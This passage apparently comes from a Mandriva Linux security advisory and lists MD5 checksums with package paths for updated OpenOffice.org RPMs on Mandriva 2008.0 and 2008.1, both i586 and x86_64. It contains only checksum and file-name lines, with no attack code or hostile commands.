 669b636b01f42885e3cb186fe78bbb88  2008.0/x86_64/openoffice.org64-l10n-nn-2.2.1-4.6mdv2008.0.x86_64.rpm
 48b4111de400b7a9465193cdb63a66c2  2008.0/x86_64/openoffice.org64-l10n-pl-2.2.1-4.6mdv2008.0.x86_64.rpm
 ed61fda31042da20306db7a3db9e385f  2008.0/x86_64/openoffice.org64-l10n-pt-2.2.1-4.6mdv2008.0.x86_64.rpm
 aaa892bf676ad7aafb0d5eb93e80fc0e  2008.0/x86_64/openoffice.org64-l10n-pt_BR-2.2.1-4.6mdv2008.0.x86_64.rpm
 dac9e02d50fdf9329f709441de564898  2008.0/x86_64/openoffice.org64-l10n-ru-2.2.1-4.6mdv2008.0.x86_64.rpm
 1aa450ceb0f70f1aeba0d0eacaf463e6  2008.0/x86_64/openoffice.org64-l10n-sk-2.2.1-4.6mdv2008.0.x86_64.rpm
 bec0f8ab5697721a0227ba43db027874  2008.0/x86_64/openoffice.org64-l10n-sl-2.2.1-4.6mdv2008.0.x86_64.rpm
 ac89afa058d6a6c980a8fb8b0d341c66  2008.0/x86_64/openoffice.org64-l10n-sv-2.2.1-4.6mdv2008.0.x86_64.rpm
 e32097358b9d8bd9b27ac1f2cae39d70  2008.0/x86_64/openoffice.org64-l10n-ta-2.2.1-4.6mdv2008.0.x86_64.rpm
 848dd7e355be1bcd5ea59eed431da2b4  2008.0/x86_64/openoffice.org64-l10n-tr-2.2.1-4.6mdv2008.0.x86_64.rpm
 0f454b10704a9dea32008eeabbcc7a65  2008.0/x86_64/openoffice.org64-l10n-zh_CN-2.2.1-4.6mdv2008.0.x86_64.rpm
 78ffac3a92249b24d85ab51290334094  2008.0/x86_64/openoffice.org64-l10n-zh_TW-2.2.1-4.6mdv2008.0.x86_64.rpm
 a19f5a49b91192ee80dd410c82a5261b  2008.0/x86_64/openoffice.org64-l10n-zu-2.2.1-4.6mdv2008.0.x86_64.rpm
 387718a764b933c0963b2d26fea7d8c9  2008.0/x86_64/openoffice.org64-mono-2.2.1-4.6mdv2008.0.x86_64.rpm
 d89b8d515866da322f6a97cf4b58dbf2  2008.0/x86_64/openoffice.org64-ooqstart-2.2.1-4.6mdv2008.0.x86_64.rpm 
 f0d795e257dbe66668734b765fe6abb9  2008.0/SRPMS/openoffice.org-2.2.1-4.6mdv2008.0.src.rpm
 d6f8e16e8588488478e283f5f0606696  2008.0/SRPMS/openoffice.org64-2.2.1-4.6mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 256a6a3e8e96c01787722d4641cf6633  2008.1/i586/openoffice.org-2.4.1.10-1.2mdv2008.1.i586.rpm
 6a55b58e9f462bd6ba030a60c2811d0d  2008.1/i586/openoffice.org-base-2.4.1.10-1.2mdv2008.1.i586.rpm
 0d184e367a11450e4a4282a841a0a157  2008.1/i586/openoffice.org-calc-2.4.1.10-1.2mdv2008.1.i586.rpm
 76cdf8225635fd4610f62cf58cb417e8  2008.1/i586/openoffice.org-common-2.4.1.10-1.2mdv2008.1.i586.rpm
 51dc40b7ae18716c94453b63c97ab9c6  2008.1/i586/openoffice.org-core-2.4.1.10-1.2mdv2008.1.i586.rpm
 6568f456e236fdff0d2d2760bf9a04cc  2008.1/i586/openoffice.org-devel-2.4.1.10-1.2mdv2008.1.i586.rpm
 d3fd08219f975c907910b9a865597545  2008.1/i586/openoffice.org-devel-doc-2.4.1.10-1.2mdv2008.1.i586.rpm
 5935a80dcb364a57fe45823ad0dfad87  2008.1/i586/openoffice.org-draw-2.4.1.10-1.2mdv2008.1.i586.rpm
 6f498a91393797044344e22553e5f316  2008.1/i586/openoffice.org-dtd-officedocument1.0-2.4.1.10-1.2mdv2008.1.i586.rpm
 512995c0998e9a6f3d06787d1fd30eb9  2008.1/i586/openoffice.org-filter-binfilter-2.4.1.10-1.2mdv2008.1.i586.rpm
 15cc0f576a3569daabf64a6ed8ba4553  2008.1/i586/openoffice.org-gnome-2.4.1.10-1.2mdv2008.1.i586.rpm
 f56a64dd97a2ba98daf8135be95a2039  2008.1/i586/openoffice.org-help-af-2.4.1.10-1.2mdv2008.1.i586.rpm
 4e2d32c80fc5a5c860c7f402d7cb680d  2008.1/i586/openoffice.org-help-ar-2.4.1.10-1.2mdv2008.1.i586.rpm
 e7f121781b26a3511cb110d3cac2c29a  2008.1/i586/openoffice.org-help-bg-2.4.1.10-1.2mdv2008.1.i586.rpm
 d8f5d7bbe73712ab43874e4376d59e23  2008.1/i586/openoffice.org-help-br-2.4.1.10-1.2mdv2008.1.i586.rpm
 f9d43fac00c46f685d983fac3c94aa36  2008.1/i586/openoffice.org-help-bs-2.4.1.10-1.2mdv2008.1.i586.rpm
 44a87f919ce415339af6d5f8219fc701  2008.1/i586/openoffice.org-help-ca-2.4.1.10-1.2mdv2008.1.i586.rpm
 6d3be4fb12262f16a7d4f0f15b5a3660  2008.1/i586/openoffice.org-help-cs-2.4.1.10-1.2mdv2008.1.i586.rpm
 5b75895f33d59f0c544bedba1d872abe  2008.1/i586/openoffice.org-help-cy-2.4.1.10-1.2mdv2008.1.i586.rpm
 28cd1949e42ee9571e90a75ebfbb1ff5  2008.1/i586/openoffice.org-help-da-2.4.1.10-1.2mdv2008.1.i586.rpm
 59a53ad5380450b16455378c21367f1f  2008.1/i586/openoffice.org-help-de-2.4.1.10-1.2mdv2008.1.i586.rpm
 f75767747067da33992f09d361ffc4b8  2008.1/i586/openoffice.org-help-el-2.4.1.10-1.2mdv2008.1.i586.rpm
 ccb6e0b1f50218c6d7a9b1b3a360b537  2008.1/i586/openoffice.org-help-en_GB-2.4.1.10-1.2mdv2008.1.i586.rpm
 3477181e27d604044f2c0941c793f94c  2008.1/i586/openoffice.org-help-es-2.4.1.10-1.2mdv2008.1.i586.rpm
 58caae4d2c2d989a943be34848de994e  2008.1/i586/openoffice.org-help-et-2.4.1.10-1.2mdv2008.1.i586.rpm
 2305987438946d0cc450466704c23cde  2008.1/i586/openoffice.org-help-eu-2.4.1.10-1.2mdv2008.1.i586.rpm
 9e81278e3fbf06cb2ed78287e3b1abc2  2008.1/i586/openoffice.org-help-fi-2.4.1.10-1.2mdv2008.1.i586.rpm
 2b3b5937b6e3409ba5fcbc8da6bddf7f  2008.1/i586/openoffice.org-help-fr-2.4.1.10-1.2mdv2008.1.i586.rpm
 bad30ff8995c1526b11b859373e646d8  2008.1/i586/openoffice.org-help-he-2.4.1.10-1.2mdv2008.1.i586.rpm
 bb95e12dbbc61477b2f9aa50a473e913  2008.1/i586/openoffice.org-help-hi-2.4.1.10-1.2mdv2008.1.i586.rpm
 31187b21d2b5866734f2aeb048c4040f  2008.1/i586/openoffice.org-help-hu-2.4.1.10-1.2mdv2008.1.i586.rpm
 620af44b0a33015205afda3c70c697b2  2008.1/i586/openoffice.org-help-it-2.4.1.10-1.2mdv2008.1.i586.rpm
 385984efb169fa7bec311908011de5bd  2008.1/i586/openoffice.org-help-ja-2.4.1.10-1.2mdv2008.1.i586.rpm
 b38d2c0b1177374768215a58a9df2825  2008.1/i586/openoffice.org-help-ko-2.4.1.10-1.2mdv2008.1.i586.rpm
 c257d69a823ab1cfb6a4b6b4e0aef429  2008.1/i586/openoffice.org-help-mk-2.4.1.10-1.2mdv2008.1.i586.rpm
 28d68263bea9ce67cbe7d0284e73d1f8  2008.1/i586/openoffice.org-help-nb-2.4.1.10-1.2mdv2008.1.i586.rpm
 a8a419790d84d9daaac72b845d517085  2008.1/i586/openoffice.org-help-nl-2.4.1.10-1.2mdv2008.1.i586.rpm
 9ddd2df68ef0be08f7f9cc24b5b5c93a  2008.1/i586/openoffice.org-help-nn-2.4.1.10-1.2mdv2008.1.i586.rpm
 de5fba0f12f525e56fde955a1aaf4edc  2008.1/i586/openoffice.org-help-pl-2.4.1.10-1.2mdv2008.1.i586.rpm
 a77fc97e2592107d45af9faf746b4608  2008.1/i586/openoffice.org-help-pt-2.4.1.10-1.2mdv2008.1.i586.rpm
 3a2750e5dbd6ab2a74f8e0961843542b  2008.1/i586/openoffice.org-help-pt_BR-2.4.1.10-1.2mdv2008.1.i586.rpm
 91d4854d2a721b6ef06b5bd80bb5627d  2008.1/i586/openoffice.org-help-ru-2.4.1.10-1.2mdv2008.1.i586.rpm
 61b8f037728b484297a8c055cfaedb5c  2008.1/i586/openoffice.org-help-sk-2.4.1.10-1.2mdv2008.1.i586.rpm
 5ff972621a2c1e0c025b019a0cea1563  2008.1/i586/openoffice.org-help-sl-2.4.1.10-1.2mdv2008.1.i586.rpm
 419d2a856b4cdc34b43da433aed7ed5c  2008.1/i586/openoffice.org-help-sv-2.4.1.10-1.2mdv2008.1.i586.rpm
 a1ef0d7dbffccb4872fb505c4647c48f  2008.1/i586/openoffice.org-help-ta-2.4.1.10-1.2mdv2008.1.i586.rpm
 0accabce2fb547399a21d033e817d436  2008.1/i586/openoffice.org-help-tr-2.4.1.10-1.2mdv2008.1.i586.rpm
 6de8cdfc7cdb4192a6989c6144be43ce  2008.1/i586/openoffice.org-help-zh_CN-2.4.1.10-1.2mdv2008.1.i586.rpm
 170dbdf3c9ace2465a6381aaae30f1ee  2008.1/i586/openoffice.org-help-zh_TW-2.4.1.10-1.2mdv2008.1.i586.rpm
 339cb6489a166eb26108fcbe6a5e8a8b  2008.1/i586/openoffice.org-help-zu-2.4.1.10-1.2mdv2008.1.i586.rpm
 a590520b41cc058c43174b4c354bcad3  2008.1/i586/openoffice.org-impress-2.4.1.10-1.2mdv2008.1.i586.rpm
 2ef46715ce3ee9a3c4e75db35a66519f  2008.1/i586/openoffice.org-java-common-2.4.1.10-1.2mdv2008.1.i586.rpm
 051f0698924ea8243a2f0de0a7860b9c  2008.1/i586/openoffice.org-kde-2.4.1.10-1.2mdv2008.1.i586.rpm
 8b07d6b9ac796b658189a0b0ac1cc2d0  2008.1/i586/openoffice.org-l10n-af-2.4.1.10-1.2mdv2008.1.i586.rpm
 16e933801a4e501c832c2cd80b9b209c  2008.1/i586/openoffice.org-l10n-ar-2.4.1.10-1.2mdv2008.1.i586.rpm
 b4b4973e446026c41f1b58edd19b2e99  2008.1/i586/openoffice.org-l10n-bg-2.4.1.10-1.2mdv2008.1.i586.rpm
 1bece14d6a1250581bb8c94f6f814e16  2008.1/i586/openoffice.org-l10n-br-2.4.1.10-1.2mdv2008.1.i586.rpm
 5c70dec828e69c3838ebb30b7d81b026  2008.1/i586/openoffice.org-l10n-bs-2.4.1.10-1.2mdv2008.1.i586.rpm
 f805ac4864cd94f0221d0defa8f88f9c  2008.1/i586/openoffice.org-l10n-ca-2.4.1.10-1.2mdv2008.1.i586.rpm
 e1569594601acf819567b3505a568f2f  2008.1/i586/openoffice.org-l10n-cs-2.4.1.10-1.2mdv2008.1.i586.rpm
 0c231f42163fed4ad12a2b85e9f38a49  2008.1/i586/openoffice.org-l10n-cy-2.4.1.10-1.2mdv2008.1.i586.rpm
 d4f7bb4391611fc755689dbca7809534  2008.1/i586/openoffice.org-l10n-da-2.4.1.10-1.2mdv2008.1.i586.rpm
 8c47ec8a28dda4a18c3bd5fa8cfd32d6  2008.1/i586/openoffice.org-l10n-de-2.4.1.10-1.2mdv2008.1.i586.rpm
 bfe77dfa05a72515569089155f67f273  2008.1/i586/openoffice.org-l10n-el-2.4.1.10-1.2mdv2008.1.i586.rpm
 9d11b3401d1f7e7552399443c1fb86eb  2008.1/i586/openoffice.org-l10n-en_GB-2.4.1.10-1.2mdv2008.1.i586.rpm
 979bf618eea4c373c8aeca4dda20e8e9  2008.1/i586/openoffice.org-l10n-es-2.4.1.10-1.2mdv2008.1.i586.rpm
 a174d6714b7ca03bcd65f8fcb3bcac02  2008.1/i586/openoffice.org-l10n-et-2.4.1.10-1.2mdv2008.1.i586.rpm
 0d1a47c388c463e30483b6376950f529  2008.1/i586/openoffice.org-l10n-eu-2.4.1.10-1.2mdv2008.1.i586.rpm
 65037473faddc41db17d3c7a380b206e  2008.1/i586/openoffice.org-l10n-fi-2.4.1.10-1.2mdv2008.1.i586.rpm
 adf2714c5a8ca39d1c76aacdd815ccb8  2008.1/i586/openoffice.org-l10n-fr-2.4.1.10-1.2mdv2008.1.i586.rpm
 adfefb80387dc5bb26f36e22aa02a548  2008.1/i586/openoffice.org-l10n-he-2.4.1.10-1.2mdv2008.1.i586.rpm
 03bafbdc8752992ccda044d32262a4e5  2008.1/i586/openoffice.org-l10n-hi-2.4.1.10-1.2mdv2008.1.i586.rpm
 496a8123223800a1fa5e2c5b5cb3aa9d  2008.1/i586/openoffice.org-l10n-hu-2.4.1.10-1.2mdv2008.1.i586.rpm
 1e71158a5e931401298c9d4cfa0ac41b  2008.1/i586/openoffice.org-l10n-it-2.4.1.10-1.2mdv2008.1.i586.rpm
 4c5df49d46620e7b11140c7797599546  2008.1/i586/openoffice.org-l10n-ja-2.4.1.10-1.2mdv2008.1.i586.rpm
 cad311f6598407c3657a8252dfb718c7  2008.1/i586/openoffice.org-l10n-ko-2.4.1.10-1.2mdv2008.1.i586.rpm
 2ae7a6c1dada9e316ab65e0f7eb4f4c3  2008.1/i586/openoffice.org-l10n-mk-2.4.1.10-1.2mdv2008.1.i586.rpm
 c7e7a26607b5ae99ff560914aea9127d  2008.1/i586/openoffice.org-l10n-nb-2.4.1.10-1.2mdv2008.1.i586.rpm
 5169a1886b841659e1f0bf38b7f30d24  2008.1/i586/openoffice.org-l10n-nl-2.4.1.10-1.2mdv2008.1.i586.rpm
 dc95d08678a1bfd4867cb45d334d96c4  2008.1/i586/openoffice.org-l10n-nn-2.4.1.10-1.2mdv2008.1.i586.rpm
 dcfeccccf119b8a189e828322080728d  2008.1/i586/openoffice.org-l10n-pl-2.4.1.10-1.2mdv2008.1.i586.rpm
 7f9a8060ce7f74c7fd386285a71cdaa8  2008.1/i586/openoffice.org-l10n-pt-2.4.1.10-1.2mdv2008.1.i586.rpm
 8c1373050c9b31d5eca4df5ee8d92a08  2008.1/i586/openoffice.org-l10n-pt_BR-2.4.1.10-1.2mdv2008.1.i586.rpm
 df8f7b13a609e3b9b7b5b17d6cab8d3f  2008.1/i586/openoffice.org-l10n-ru-2.4.1.10-1.2mdv2008.1.i586.rpm
 db9bab496af43b029c3e29ab53b1c69e  2008.1/i586/openoffice.org-l10n-sk-2.4.1.10-1.2mdv2008.1.i586.rpm
 cb5049ec13514f90163ff7ada6611166  2008.1/i586/openoffice.org-l10n-sl-2.4.1.10-1.2mdv2008.1.i586.rpm
 06cb6ea6d4e146bf56108e043c7a633c  2008.1/i586/openoffice.org-l10n-sv-2.4.1.10-1.2mdv2008.1.i586.rpm
 e6a991a08723c205ab758e102f68a6eb  2008.1/i586/openoffice.org-l10n-ta-2.4.1.10-1.2mdv2008.1.i586.rpm
 293d345d85125ad090515515b2f29752  2008.1/i586/openoffice.org-l10n-tr-2.4.1.10-1.2mdv2008.1.i586.rpm
 fef15090f413ebba9f5df0c742f9bb77  2008.1/i586/openoffice.org-l10n-zh_CN-2.4.1.10-1.2mdv2008.1.i586.rpm
 b16725e1842638037f3e9c72c67bb856  2008.1/i586/openoffice.org-l10n-zh_TW-2.4.1.10-1.2mdv2008.1.i586.rpm
 0b717336ee4b88c62ce549cb7f9b7a38  2008.1/i586/openoffice.org-l10n-zu-2.4.1.10-1.2mdv2008.1.i586.rpm
 4932b836f412f82f0665218fee77a456  2008.1/i586/openoffice.org-math-2.4.1.10-1.2mdv2008.1.i586.rpm
 7d5903205d5aeda006df1f022fe8fba7  2008.1/i586/openoffice.org-mono-2.4.1.10-1.2mdv2008.1.i586.rpm
 fa85f50cfbd4de83e5c4aa5f8aeb7014  2008.1/i586/openoffice.org-openclipart-2.4.1.10-1.2mdv2008.1.i586.rpm
 591d47ac7a35792e42195ca20331cacc  2008.1/i586/openoffice.org-pyuno-2.4.1.10-1.2mdv2008.1.i586.rpm
 bad1120e0bd7335f2d19cb560d3025f9  2008.1/i586/openoffice.org-style-andromeda-2.4.1.10-1.2mdv2008.1.i586.rpm
 cba5ce8ad20890bcdb98098a4d084564  2008.1/i586/openoffice.org-style-crystal-2.4.1.10-1.2mdv2008.1.i586.rpm
 e135ad6e5682993ae1e0e1986859291d  2008.1/i586/openoffice.org-style-hicontrast-2.4.1.10-1.2mdv2008.1.i586.rpm
 0d7776b841c344ae9994bb9c904816ab  2008.1/i586/openoffice.org-style-industrial-2.4.1.10-1.2mdv2008.1.i586.rpm
 adcee3426879652b0f08792b44db4ae5  2008.1/i586/openoffice.org-style-tango-2.4.1.10-1.2mdv2008.1.i586.rpm
 75aba98ad00ea34d31b512e1d5fae71a  2008.1/i586/openoffice.org-testtool-2.4.1.10-1.2mdv2008.1.i586.rpm
 caa130da54ef197aaa5abdfe306349fa  2008.1/i586/openoffice.org-writer-2.4.1.10-1.2mdv2008.1.i586.rpm 
 b13fae74b49bcdf0c9f1228ee2ad8244  2008.1/SRPMS/openoffice.org-2.4.1.10-1.2mdv2008.1.src.rpm
 d71b49c8df8e4a44f3ba4604065a5e4d  2008.1/SRPMS/openoffice.org64-2.4.1.10-1.2mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 a81834017dc02224503858c980259f20  2008.1/x86_64/openoffice.org64-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 c607b3c0035dd82e7d93e6f1b4ae39f9  2008.1/x86_64/openoffice.org64-base-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 b385e7701495a0aaa899e902fde70e45  2008.1/x86_64/openoffice.org64-calc-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 f3224dfeb8f0699f5dbb7cd09a44f1c2  2008.1/x86_64/openoffice.org64-common-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 91e4b2d2fc8481ceef8a661881368e4c  2008.1/x86_64/openoffice.org64-core-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 445f62924c522f5db044a5997f89f11f  2008.1/x86_64/openoffice.org64-devel-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 779c30b5b4262f9e1e31e3f665360e3a  2008.1/x86_64/openoffice.org64-devel-doc-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 d686bcb84fa4e469ae23c9773581e880  2008.1/x86_64/openoffice.org64-draw-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 fe06daa7c03e58b7f3803e2cc23c8a53  2008.1/x86_64/openoffice.org64-dtd-officedocument1.0-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 1ed7250f362034e33ddb789bb659fccb  2008.1/x86_64/openoffice.org64-filter-binfilter-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 9efd0a99efb4fd68211a6ee541f883ee  2008.1/x86_64/openoffice.org64-gnome-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 9338c23866d2ba294ba48d1d84924fb5  2008.1/x86_64/openoffice.org64-help-af-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 4f6744cbb12704e838bcd4fb07164af8  2008.1/x86_64/openoffice.org64-help-ar-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ab57427f78f673e3529b50132266a72a  2008.1/x86_64/openoffice.org64-help-bg-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 effeb989a72cb15d5d811349ebdfd7ac  2008.1/x86_64/openoffice.org64-help-br-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 8f5133cffa13ac39a2fd5f3c77eae99b  2008.1/x86_64/openoffice.org64-help-bs-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 4ea7345f46a4e36c00492fe6441541b6  2008.1/x86_64/openoffice.org64-help-ca-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 8f8976c3e35564d492b09ec19a11ed54  2008.1/x86_64/openoffice.org64-help-cs-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 acb4abf343f74da5a645950a07d66d49  2008.1/x86_64/openoffice.org64-help-cy-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 9e41a05b14ad331e460e0707c8d5bdc9  2008.1/x86_64/openoffice.org64-help-da-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 51193286d9cc06b2857e6826ba8dfc67  2008.1/x86_64/openoffice.org64-help-de-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 600b381c3d694ce02a27f214dd6653c0  2008.1/x86_64/openoffice.org64-help-el-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 b9d734e5c1599fab37bd9edff5e84dd0  2008.1/x86_64/openoffice.org64-help-en_GB-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 65bb60e9b6b691bb8b20de8f53609bd7  2008.1/x86_64/openoffice.org64-help-es-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 f88d92152670a5a751165745fd9e9d89  2008.1/x86_64/openoffice.org64-help-et-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 e5b4c3df412c0e1ba4adf479a6c1aedc  2008.1/x86_64/openoffice.org64-help-eu-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 e1fabc05dc6b4abad6cfedf3f7984efa  2008.1/x86_64/openoffice.org64-help-fi-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 b29eef0875a4a6712ae2860f8155c636  2008.1/x86_64/openoffice.org64-help-fr-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 91b931f9f3ced99ea0f5486026b412f1  2008.1/x86_64/openoffice.org64-help-he-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 0ccc780bcb9a0cf0de6aca533ccc8686  2008.1/x86_64/openoffice.org64-help-hi-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 0e9e87bb5b0cac174d7f8ffe494f7134  2008.1/x86_64/openoffice.org64-help-hu-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 56e569a09352692980cf740637a61772  2008.1/x86_64/openoffice.org64-help-it-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 4fa418c47c59bdabace0632f8b4dce12  2008.1/x86_64/openoffice.org64-help-ja-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 b414d45283bb8eb259ea190b542c5cfb  2008.1/x86_64/openoffice.org64-help-ko-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 23d068a6877648d532795d7bbed05bb3  2008.1/x86_64/openoffice.org64-help-mk-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 5d0156abfc24200edd5a39d33794d0b1  2008.1/x86_64/openoffice.org64-help-nb-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 8617e58c17e77ae5b6a8a1c0a6470cec  2008.1/x86_64/openoffice.org64-help-nl-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 22c21af1421a7e63f78cb3fe6cde4083  2008.1/x86_64/openoffice.org64-help-nn-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 04f97c053fca52759fb59c55cb82c7be  2008.1/x86_64/openoffice.org64-help-pl-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 d1f2a4170e51eb90e0f2b67883ab46b9  2008.1/x86_64/openoffice.org64-help-pt-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 52b4fed60d7bf1e17ea321a15fe96bfc  2008.1/x86_64/openoffice.org64-help-pt_BR-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 62e4b796b2df90bc1b51ddc5e850665e  2008.1/x86_64/openoffice.org64-help-ru-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 b83aa61082460a0824693fe597dee65d  2008.1/x86_64/openoffice.org64-help-sk-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 7d179f4000b00b504d2d3820206ba820  2008.1/x86_64/openoffice.org64-help-sl-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 8f88a4ef490272ecb3d44299c01b00db  2008.1/x86_64/openoffice.org64-help-sv-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 adc143e9c189e9add8dc0e179531c7e4  2008.1/x86_64/openoffice.org64-help-ta-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 4c84fe0a674e8d86c2ca2cceb76f060e  2008.1/x86_64/openoffice.org64-help-tr-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 1fb8b2f940326e83671fc33e2fadae93  2008.1/x86_64/openoffice.org64-help-zh_CN-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 0721265da56633b3593101ece3b273f0  2008.1/x86_64/openoffice.org64-help-zh_TW-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 da8c00b8a03440f7f90eabb4e1b0fa52  2008.1/x86_64/openoffice.org64-help-zu-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 95ea19875666d9506e50f312e73530f5  2008.1/x86_64/openoffice.org64-impress-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 504273083d8edd5e9fe2d96b1aca835f  2008.1/x86_64/openoffice.org64-java-common-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 8f0194f36d98d2a14f496d639817b5ac  2008.1/x86_64/openoffice.org64-kde-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 3c5e8c2960465a45ac0cce08454759bf  2008.1/x86_64/openoffice.org64-l10n-af-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 0821d25ef8cc2ee251905faf7b6b58d3  2008.1/x86_64/openoffice.org64-l10n-ar-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 caa1396bd833ae374f387162829aaebb  2008.1/x86_64/openoffice.org64-l10n-bg-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ece6f8d442375a0ee75aafdbda764c02  2008.1/x86_64/openoffice.org64-l10n-br-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 51e25dc0b5f69fb8f1d5cce6e303c7c3  2008.1/x86_64/openoffice.org64-l10n-bs-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 15ea0fd7cbedd855bdf59c03c0a15644  2008.1/x86_64/openoffice.org64-l10n-ca-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 9ca9693fa9fc41573b0e13c44653669d  2008.1/x86_64/openoffice.org64-l10n-cs-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ae5ca54f3477d9e9c7bef7b0a35ad603  2008.1/x86_64/openoffice.org64-l10n-cy-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 214deb2c0173a687b5ba8f716f774b65  2008.1/x86_64/openoffice.org64-l10n-da-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 faf0d64c78ecad5a5961ea9f6e909266  2008.1/x86_64/openoffice.org64-l10n-de-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ab39a78241db15dcc68dac339ee0d0d7  2008.1/x86_64/openoffice.org64-l10n-el-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 e8175d4c47d5d75e2ac2199861401905  2008.1/x86_64/openoffice.org64-l10n-en_GB-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 83b11f4b7cf4d42549273bb0faa166ad  2008.1/x86_64/openoffice.org64-l10n-es-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 0d3c5487e2b5365e1f33502dc2527613  2008.1/x86_64/openoffice.org64-l10n-et-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 b0fdf76eb0a9ee188db58cf8dbda3bd9  2008.1/x86_64/openoffice.org64-l10n-eu-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 450e0908769039466e01c2e186d144d5  2008.1/x86_64/openoffice.org64-l10n-fi-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 b72a1dec7344bac32221c6442a6585c0  2008.1/x86_64/openoffice.org64-l10n-fr-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 8b797c49aed0d49a3d1167529e4c9459  2008.1/x86_64/openoffice.org64-l10n-he-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 88ddbfe0d9af6197e190693faabd9733  2008.1/x86_64/openoffice.org64-l10n-hi-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 735d2437170345e3dd34fa793fadaabd  2008.1/x86_64/openoffice.org64-l10n-hu-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 5e7353448079d039982c4cf4d015f3d7  2008.1/x86_64/openoffice.org64-l10n-it-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 e68f720709834833363f6b1c1bacc712  2008.1/x86_64/openoffice.org64-l10n-ja-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 59c0d03af9746400d96dd9248becace7  2008.1/x86_64/openoffice.org64-l10n-ko-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ed608f7d22f2a081d73169812c23535c  2008.1/x86_64/openoffice.org64-l10n-mk-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 d6783c6715e8eceee7c151b9db920133  2008.1/x86_64/openoffice.org64-l10n-nb-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 4ddfe0ab40d1e71828718437583380f4  2008.1/x86_64/openoffice.org64-l10n-nl-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 4469170a78cdee8afe0e4750bf3ada7e  2008.1/x86_64/openoffice.org64-l10n-nn-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 446b071f342ee9cbdece1ee26dbe5b69  2008.1/x86_64/openoffice.org64-l10n-pl-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 d5b509055394933fe95b05e93e48508a  2008.1/x86_64/openoffice.org64-l10n-pt-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ce1c2a31a4ffad1a2d9dc9ae4b7cb384  2008.1/x86_64/openoffice.org64-l10n-pt_BR-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 954ff85b84531509dedbecec0f146245  2008.1/x86_64/openoffice.org64-l10n-ru-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 43a9641801e13da8320c814e03f043ce  2008.1/x86_64/openoffice.org64-l10n-sk-2.4.1.10-1.2mdv2008.1.x86_64.rpm
